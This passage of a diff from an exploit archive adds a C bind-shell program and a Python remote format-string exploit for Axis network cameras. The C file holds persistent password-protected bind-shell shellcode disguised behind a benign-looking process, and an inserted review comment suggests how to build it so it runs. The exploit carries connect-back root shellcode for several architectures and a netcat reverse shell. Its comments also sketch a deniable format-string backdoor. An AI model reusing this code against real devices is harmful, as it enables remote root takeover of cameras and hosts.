+"\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40\x88\xc7\x40\xb6\x03" +"\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x50\x48\xbb" +"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE2 Persistent bind shell with a password (148 bytes) +//| ========================================================================= +//| Supports re-connecting after a disconnect (close terminal and open up again) +//| If you type in a password wrong, wait 60 seconds to reconnect. 
+//| If you close the terminal after you enter the correct password, you can +//| immediatly reconnect. +//| This code only supports one terminal. + + +unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\x6a\x39\x58\x0f\x05\x48\x31\xff" +"\x48\x39\xf8\x74\x79\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e" +"\xb0\x29\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e" +"\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40" +"\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89\xc7\x48" +"\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD"" +"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7" +"\xe6\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b" +"\x0f\x05\xe9\x6c\xff\xff\xff"; + + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE3 Persistent bind shell with multi-port/terminal + password (177 bytes) +//| ========================================================================= +//| This bind shell has everything COD2 has to offer + more while only 29 bytes more +//| You will get as many terminals on the victim as your PORT-RANGE minus 1 +//| Your lowest port will NOT be open (so minus 1 port/terminal from your range) +//| Example: ports 4440-4445 = ports 4441-4445 usable = 5 terminals on victim + + +unsigned char CODE3[] = //replace CODE3 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xf6\x56\x66\x68"HIGH_PORT"\x5b\x48\xff\xcb\x66\x81\xfb"LOW_PORT"" +"\x75\x06\x50\x66\x68"HIGH_PORT"\x5b\x48\x31\xff\x48\xf7\xe7\xb0\x39\x0f" +"\x05\x48\x31\xff\x48\x39\xf8\x74\x7b\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02" +"\x6a\x01\x5e\xb0\x29\x0f\x05\x48\x97\x86\xdf\x6a\x02\x66\x89\x5c\x24\x02" 
+"\x86\xdf\x54\x5e\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b" +"\x0f\x05\x40\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89" +"\xc7\x48\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD"" +"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6" +"\x50\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05" +"\x48\x31\xff\x48\xf7\xe7\xe9\x58\xff\xff\xff"; + + + +//|========================== VOID SHELLCODE =========================== +void SHELLCODE() +{ +// This part floods the registers to make sure the shellcode will always run + __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t" + "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" + "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" + "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" + "call CODE3"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +} + +//|========================== VOID printBytes =========================== +void printBytes() +{ +printf("The CripSlick's code is %d Bytes Long\n", + strlen(CODE3)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +} + + +//|============================== Int main ================================ +int main () +{ + +// IMPORTANT> replace CODEX the "unsigned char" variable below +// > This needs to be done twice (for string count + code to use) + +int pid = fork(); // fork start + if(pid == 0){ // pid always starts at 0 + + SHELLCODE(); // launch void SHELLCODE + // this is to represent a scenario where you bind to a good program + // you always want your shellcode to run first + + }else if(pid > 0){ // pid will always be greater than 0 after the 1st process + // this argument will always be satisfied + + printBytes(); // launch printBYTES + // pretend that this is the one the victim thinks he is only using + } +return 0; // satisfy int main 
+system("exit"); // keeps our shellcode a daemon
+}
+
diff --git a/platforms/multiple/remote/40125.py b/platforms/multiple/remote/40125.py
new file mode 100755
index 000000000..dbd1bb711
--- /dev/null
+++ b/platforms/multiple/remote/40125.py
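Review bot: `system("exit"); // keeps our shellcode a daemon` is placed after `return 0;` at the end of main(), so it is never executed and the comment describes behaviour the program does not have; what actually keeps the listener alive is the forked child in SHELLCODE(), whose `call CODE3` presumably never returns, while the parent only prints the byte count and exits. Delete that line, or move it above the `return` if it is meant to do something. printBytes() reports `strlen(CODE3)` through `%d`: strlen stops at the first 0x00, so the count silently shrinks as soon as PORT, PASSWORD, HIGH_PORT or LOW_PORT contains a NUL byte, and `%d` is the wrong conversion for a size_t — `printf("The CripSlick's code is %zu Bytes Long\n", sizeof(CODE3) - 1);` is exact and warning-free. `call CODE3` in SHELLCODE() jumps into a writable data array and the file gives no build flags, so a one-line build note stating how it was linked (presumably with an executable stack/data segment, e.g. `-z execstack`, on the 2016-era toolchain it was tested on) would spare readers a segfault on a default hardened toolchain. The two `#include` lines at the top of the hunk carry no header name as shown here; if that is not an extraction artefact, `<stdio.h>`, `<string.h>`, `<stdlib.h>` and `<unistd.h>` are needed for printf, strlen, system and fork.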
@@ -0,0 +1,1730 @@
+#!/usr/bin/env python2.7
+#
+# [SOF]
+#
+# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
+# Research and development by bashis 2016
+#
+# This format string vulnerability has following characteristic:
+# - Heap Based (Exploiting string located on the heap)
+# - Blind Attack (No output the remote attacker)(*)
+# - Remotly exploitable (As anonymous, no credentials needed)
+#
+# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
+#
+# This exploit has following characteristic:
+# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
+# - Modifying LHOST/LPORT in shellcode on the fly
+# - Manual exploiting of remote targets
+# - Simple HTTPS support
+# - Basic Authorization support (not needed for this exploit)
+# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
+# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
+# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
+# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
+# - Multiple FMS exploit techniques
+# - "One-Write-Where-And-What" for MIPS and CRISv32
+# Using "Old Style" POP's
+# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
+# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
+# - "Two-Write-Where-And-What" for ARM +# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address +# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write +# [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually] +# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x) +# - Exploit is quite well documented +# +# Anyhow, +# Everything started from this simple remote request: +# +# --- +# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80 +# HTTP/1.1 500 Server Error +# Content-Type: text/html; charset=ISO-8859-1 +# +# 500 Server Error +#

500 Server Error

+# The server encountered an internal error and could not complete your request. +# +# --- +# +# Which gave this output in /var/log/messages on the remote device: +# +# --- +# Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10 +# Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data. +# --- +# +# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products +# +# --- +# $ netcat -vvlp 31337 +# listening on [any] 31337 ... +# 192.168.0.90: inverse host lookup failed: Unknown host +# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738 +# id +# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz) +# pwd +# /usr/html +# --- +# +# Some technical notes: +# +# 1. Direct addressing with %$%n is "delayed", and comes in force only after disconnect. +# Old metod with POP's coming into force instantly +# +# 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's) +# - Would be interesting to investigate why. +# +# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26 +# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff +# +# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff +# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f +# +# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit: +# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!) +# +# 4. Everything is randomized, except heap. +# +# 5. My initial attempts to use ROP's was not good, as I didn't want to create +# one unique FMS key by testing each single firmware version, and using ROP with FMS +# on heap seems pretty complicated as there is one jump availible, maximum two. +# +# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case. +# +# 6. 
Encoded and Decoded shellcode located in .bss section.
+# 6.1 FMS excecuted on heap
+#
+# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
+# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
+# so execute shellcode on heap/stack may be impossible.
+# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,
+# and re-compile of the image.
+# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
+#
+# 8. This exploit are pretty well documented, more details can be extracted by reading
+# the code and comments.
+#
+# MIPS ssid maps
+# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid
+# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid
+# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]
+#
+# ARM ssid maps
+# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid
+# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid
+# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]
+#
+# Crisv32 ssid maps
+# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid
+# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid
+# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]
+#
+# General notes:
+#
+# When the vul daemon process is exploited, and after popping root connect-back shell,
+# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,
+# when the main process are fully alive again, I can enjoy the shell, and everybody else can
+# enjoy of the camera - that should make all of us happy ;)
+# During exploiting, logs says almost nothing, only that the main process restarted. 
+# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)
+#
+# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),
+# after ssid cannot verify the user, free() are the closest function to be called after
+# vsyslog(), needed and perfect to use for jumping.
+# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.
+# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.
+#
+# Quite surprised to see so many different devices and under one major release version,
+# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version.
+#
+# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor,
+# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password.
+#
+# - No hardcoded login/password that could easily be found in firmware/software files.
+# - Extremely hard to find without local access (and find out what to trigger for opening the door)
+# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version."
+# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)
+#
+# Note:
+# I don't say that Axis Communication has made this hidden format string by this purpose.
+# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon,
+# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr(). 
+#
+# Vulnerable and exploitable products
+#
+# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,
+# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,
+# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,
+# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,
+# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,
+# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,
+# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,
+# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,
+# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,
+# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,
+# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,
+# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,
+# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,
+# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,
+# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,
+# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... 
and more
+#
+# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
+#
+# Firmware versions vulnerable to the SSI FMS exploit
+#
+# ('V.Vx' == The FMS key used in this exploit)
+#
+# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x)
+# 5.00.x 2008 - - no
+# 5.01.x 2008 no - no
+# 5.02.x 2008 no - -
+# 5.05.x 2009 no - -
+# 5.06.x 2009 no - -
+# 5.07.x 2009 no - no
+# 5.08.x 2010 no - -
+# 5.09.x 2010 no - -
+# 5.10.x 2009 no - -
+# 5.11.x 2010 no - -
+# 5.12.x 2010 no - -
+# 5.15.x 2010 no - -
+# 5.16.x 2010 no - -
+# 5.20.x 2010-2011 5.2x - 5.2x
+# 5.21.x 2011 5.2x - 5.2x
+# 5.22.x 2011 5.2x - -
+# 5.25.x 2011 5.2x - -
+# 5.40.x 2011 5.4x 5.4x 5.4x
+# 5.41.x 2012 5.4x - -
+# 5.50.x 2013 5.5x 5.5x 5.4x
+# 5.51.x 2013 - 5.4x -
+# 5.55.x 2013 - 5.5x 5.5x
+# 5.60.x 2014 - 5.6x 5.6x
+# 5.65.x 2014-2015 - 5.6x -
+# 5.70.x 2015 - 5.7x -
+# 5.75.x 2015 - 5.7x 5.7x
+# 5.80.x 2015 - 5.8x 5.8x
+# 5.81.x 2015 - 5.8x -
+# 5.85.x 2015 - 5.8x 5.8x
+# 5.90.x 2015 - 5.9x -
+# 5.95.x 2016 - 5.9x 5.8x
+# 6.10.x 2016 - 6.1x -
+# 6.15.x 2016 - - 6.1x
+# 6.20.x 2016 - 6.2x -
+#
+# Vendor URL's of still supported and affected products
+#
+# http://www.axis.com/global/en/products/access-control
+# http://www.axis.com/global/en/products/video-encoders
+# http://www.axis.com/global/en/products/network-cameras
+# http://www.axis.com/global/en/products/audio
+#
+# Axis Product Security
+#
+# product-security@axis.com
+# http://www.axis.com/global/en/support/product-security
+# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
+# http://www.axis.com/global/en/support/faq/FAQ116268
+#
+# Timetable
+#
+# - Research and Development: 06/01/2016 - 01/06/2016
+# - Sent vulnerability details to vendor: 05/06/2016
+# - Vendor responce received: 06/06/2016
+# - Vendor ACK of findings received: 07/06/2016
+# - Vendor sent verification image: 13/06/2016
+# - Confirmed that exploit do not work after vendors correction: 13/06/2016
+# - Vendor informed 
about their service release(s): 29/06/2016
+# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016
+# - Full Disclosure: 18/07/2016
+#
+# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>"
+#
+# Have a nice day
+# /bashis
+#
+#####################################################################################
+
+import sys
+import string
+import socket
+import time
+import argparse
+import urllib, urllib2, httplib
+import base64
+import ssl
+import re
+
+
+class do_FMS:
+
+# POP = "%8x" # Old style POP's with 8 bytes per POP
+ POP = "%1c" # Old style POP's with 1 byte per POP
+ WRITElln = "%lln" # Write 8 bytes
+ WRITEn = "%n" # Write 4 bytes
+ WRITEhn = "%hn" # Write 2 bytes
+ WRITEhhn = "%hhn" # Write 1 byte
+
+ def __init__(self,targetIP,verbose):
+ self.targetIP = targetIP
+ self.verbose = verbose
+ self.fmscode = ""
+
+ # Mostly used internally in this function
+ def Add(self, data):
+ self.fmscode += data
+
+ # 'New Style' Double word (8 bytes)
+ def AddDirectParameterLLN(self, ADDR):
+ self.Add('%')
+ self.Add(str(ADDR))
+ self.Add('$lln')
+
+ # 'New Style' Word (4 bytes)
+ def AddDirectParameterN(self, ADDR):
+ self.Add('%')
+ self.Add(str(ADDR))
+ self.Add('$n')
+
+ # 'New Style' Half word (2 bytes)
+ def AddDirectParameterHN(self, ADDR):
+ self.Add('%')
+ self.Add(str(ADDR))
+ self.Add('$hn')
+
+ # 'New Style' One Byte (1 byte)
+ def AddDirectParameterHHN(self, ADDR):
+ self.Add('%')
+ self.Add(str(ADDR))
+ self.Add('$hhn')
+
+ # Addressing
+ def AddADDR(self, ADDR):
+ self.Add('%')
+ self.Add(str(ADDR))
+ self.Add('u')
+
+ # 'Old Style' POP
+ def AddPOP(self, size):
+ if size != 0:
+ self.Add(self.POP * size)
+
+ # Normally only one will be sent, multiple is good to quick-check for any FMS
+ #
+ # 'Old Style' Double word (8 bytes)
+ def AddWRITElln(self, size):
+ self.Add(self.WRITElln * size)
+
+ # 'Old Style' Word (4 bytes)
+ def AddWRITEn(self, size):
+ self.Add(self.WRITEn * size)
+
+ # 'Old Style' Half word (2 
bytes) + def AddWRITEhn(self, size): + self.Add(self.WRITEhn * size) + + # 'Old Style' One byte (1 byte) + def AddWRITEhhn(self, size): + self.Add(self.WRITEhhn * size) + + # Return the whole FMS string + def FMSbuild(self): + return self.fmscode + +class HTTPconnect: + + def __init__(self, host, proto, verbose, creds, noexploit): + self.host = host + self.proto = proto + self.verbose = verbose + self.credentials = creds + self.noexploit = noexploit + + # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc.. + def RAW(self, uri): + # Connect-timeout in seconds + timeout = 5 + socket.setdefaulttimeout(timeout) + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + tmp = self.host.split(':') + HOST = tmp[0] + PORT = int(tmp[1]) + if self.verbose: + print "[Verbose] Sending to:", HOST + print "[Verbose] Port:", PORT + print "[Verbose] URI:",uri + s.connect((HOST, PORT)) + s.send("GET %s HTTP/1.0\r\n\r\n" % uri) + html = (s.recv(4096)) # We really do not care whats coming back +# if html: +# print "[i] Received:",html + s.shutdown(3) + s.close() + return html + + + def Send(self, uri): + + # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually + # matter for the functionality of this exploit, only for future references. 
+ headers = { + 'User-Agent' : 'MSIE', + } + + # Connect-timeout in seconds + timeout = 5 + socket.setdefaulttimeout(timeout) + + url = '%s://%s%s' % (self.proto, self.host, uri) + + if self.verbose: + print "[Verbose] Sending:", url + + if self.proto == 'https': + if hasattr(ssl, '_create_unverified_context'): + print "[i] Creating SSL Default Context" + ssl._create_default_https_context = ssl._create_unverified_context + + if self.credentials: + Basic_Auth = self.credentials.split(':') + if self.verbose: + print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] + try: + pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() + pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) + auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) + opener = urllib2.build_opener(auth_handler) + urllib2.install_opener(opener) + except Exception as e: + print "[!] Basic Auth Error:",e + sys.exit(1) + + if self.noexploit and not self.verbose: + print "[<] 204 Not Sending!" + html = "Not sending any data" + else: + data = None + req = urllib2.Request(url, data, headers) + rsp = urllib2.urlopen(req) + if rsp: + print "[<] %s OK" % rsp.code + html = rsp.read() + return html + + +class shellcode_db: + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + + def sc(self,target): + self.target = target + + +# Connect back shellcode +# +# CRISv32: Written by myself, no shellcode availible out on "The Internet" +# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators +# MIPSel: Written by Jacob Holcomb (url encoded by me) +# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php +# + # Slightly modified syscall's + MIPSel = string.join([ + #close stdin + "%ff%ff%04%28" #slti a0,zero,-1 + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + #close stdout + "%11%11%04%28" #slti a0,zero,4369 + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + #close stderr + 
"%fd%ff%0c%24" #li t4,-3 + "%27%20%80%01" #nor a0,t4,zero + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + # socket AF_INET (2) + "%fd%ff%0c%24" #li t4,-3 + "%27%20%80%01" #nor a0,t4,zero + "%27%28%80%01" #nor a1,t4,zero + "%ff%ff%06%28" #slti a2,zero,-1 + "%57%10%02%24" #li v0,4183 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + "%ff%ff%44%30" # andi $a0, $v0, 0xFFFF + # + # dup2 stdout + "%c9%0f%02%24" #li v0,4041 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + # dup2 stderr + "%c9%0f%02%24" #li v0,4041 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + # Port + "PP1PP0%05%3c" + "%01%ff%a5%34" + # + "%01%01%a5%20" #addi a1,a1,257 + "%f8%ff%a5%af" #sw a1,-8(sp) + # + # IP + "IP3IP4%05%3c" + "IP1IP2%a5%34" + # + "%fc%ff%a5%af" #sw a1,-4(sp) + "%f8%ff%a5%23" #addi a1,sp,-8 + "%ef%ff%0c%24" #li t4,-17 + "%27%30%80%01" #nor a2,t4,zero + "%4a%10%02%24" #li v0,4170 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + "%62%69%08%3c" #lui t0,0x6962 + "%2f%2f%08%35" #ori t0,t0,0x2f2f + "%ec%ff%a8%af" #sw t0,-20(sp) + "%73%68%08%3c" #lui t0,0x6873 + "%6e%2f%08%35" #ori t0,t0,0x2f6e + "%f0%ff%a8%af" #sw t0,-16(sp + "%ff%ff%07%28" #slti a3,zero,-1 + "%f4%ff%a7%af" #sw a3,-12(sp) + "%fc%ff%a7%af" #sw a3,-4(sp + "%ec%ff%a4%23" #addi a0,sp,-20 + "%ec%ff%a8%23" #addi t0,sp,-20 + "%f8%ff%a8%af" #sw t0,-8(sp) + "%f8%ff%a5%23" #addi a1,sp,-8 + "%ec%ff%bd%27" #addiu sp,sp,-20 + "%ff%ff%06%28" #slti a2,zero,-1 + "%ab%0f%02%24" #li v0,4011 (execve) + "%4c%f7%f7%03" #syscall 0xdfdfd + ], '') + + # Working netcat shell + # - $PATH will locate 'mkfifo', 'nc' and 'rm' + # - LHOST / LPORT will be changed on the fly later in the code + # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting + # - $IFS = [By default, and we need or as separator] + # $ echo -n "$IFS" | hexdump -C + # 00000000 20 09 0a + # - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c] + # + # '2>/tmp/s' (STDERR > 
FIFO) Don't work with $IFS as separator + # + # Working with Apache and Boa +# NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1" + NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0/tmp/s;rm$IFS/tmp/s;$PS1" + + ARMel = string.join([ + # original: http://shell-storm.org/shellcode/files/shellcode-754.php + # 32-bit instructions, enter thumb mode + "%01%10%8f%e2" # add r1, pc, #1 + "%11%ff%2f%e1" # bx r1 + + # 16-bit thumb instructions follow + # + # socket(2, 1, 0) + "%02%20" #mov r0, #2 + "%01%21" #mov r1, #1 + "%92%1a" #sub r2, r2, r2 + "%0f%02" #lsl r7, r1, #8 + "%19%37" #add r7, r7, #25 + "%01%df" #svc 1 + # + # connect(r0, &addr, 16) + "%06%1c" #mov r6, r0 + "%08%a1" #add r1, pc, #32 + "%10%22" #mov r2, #16 + "%02%37" #add r7, #2 + "%01%df" #svc 1 + # + # dup2(r0, 0/1/2) + "%3f%27" #mov r7, #63 + "%02%21" #mov r1, #2 + # + #lb: + "%30%1c" #mov r0, r6 + "%01%df" #svc 1 + "%01%39" #sub r1, #1 + "%fb%d5" #bpl lb + # + # execve("/bin/sh", ["/bin/sh", 0], 0) + "%05%a0" #add r0, pc, #20 + "%92%1a" #sub r2, r2, r2 + "%05%b4" #push {r0, r2} + "%69%46" #mov r1, sp + "%0b%27" #mov r7, #11 + "%01%df" #svc 1 + # + "%c0%46" # .align 2 (NOP) + "%02%00" # .short 0x2 (struct sockaddr) + "PP1PP0" # .short 0x3412 (port: 0x1234) + "IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1) + # .ascii "/bin/sh\0\0" + "%2f%62%69%6e" # /bin + "%2f%73%68%00%00" # /sh\x00\x00 + "%00%00%00%00" + "%c0%46" + ], '') + + + # Connect-back shell for Axis CRISv32 + # Written by mcw noemail eu 2016 + # + CRISv32 = string.join([ + #close(0) + "%7a%86" # clear.d r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + #close(1) + "%41%a2" # moveq 1,r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + #close(2) + "%42%a2" # moveq 2,r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + # + "%10%e1" # addoq 16,sp,acr + "%42%92" # moveq 2,r9 + "%df%9b" # move.w r9,[acr] + "%10%e1" # addoq 16,sp,acr + 
"%02%f2" # addq 2,acr + #PORT + "%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 # + "%df%9b" # move.w r9,[acr] + "%10%e1" # addoq 16,sp,acr + "%6f%96" # move.d acr,r9 + "%04%92" # addq 4,r9 + #IP + "%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr + "%e9%fb" # move.d acr,[r9] + # + #socket() + "%42%a2" # moveq 2,r10 + "%41%b2" # moveq 1,r11 + "%7c%86" # clear.d r12 + "%6e%96" # move.d $sp,$r9 + "%e9%af" # move.d $r10,[$r9+] + "%e9%bf" # move.d $r11,[$r9+] + "%e9%cf" # move.d $r12,[$r9+] + "%41%a2" # moveq 1,$r10 + "%6e%b6" # move.d $sp,$r11 + "%5f%9c%66%00" # movu.w 0x66,$r9 + "%3d%e9" # break 13 + # + "%6a%96" # move.d $r10,$r9 + "%0c%e1" # addoq 12,$sp,$acr + "%ef%9b" # move.d $r9,[$acr] + "%0c%e1" # addoq 12,$sp,$acr + "%6e%96" # move.d $sp,$r9 + "%10%92" # addq 16,$r9 + "%6f%aa" # move.d [$acr],$r10 + "%69%b6" # move.d $r9,$r11 + "%50%c2" # moveq 16,$r12 + # + # connect() + "%6e%96" # move.d $sp,$r9 + 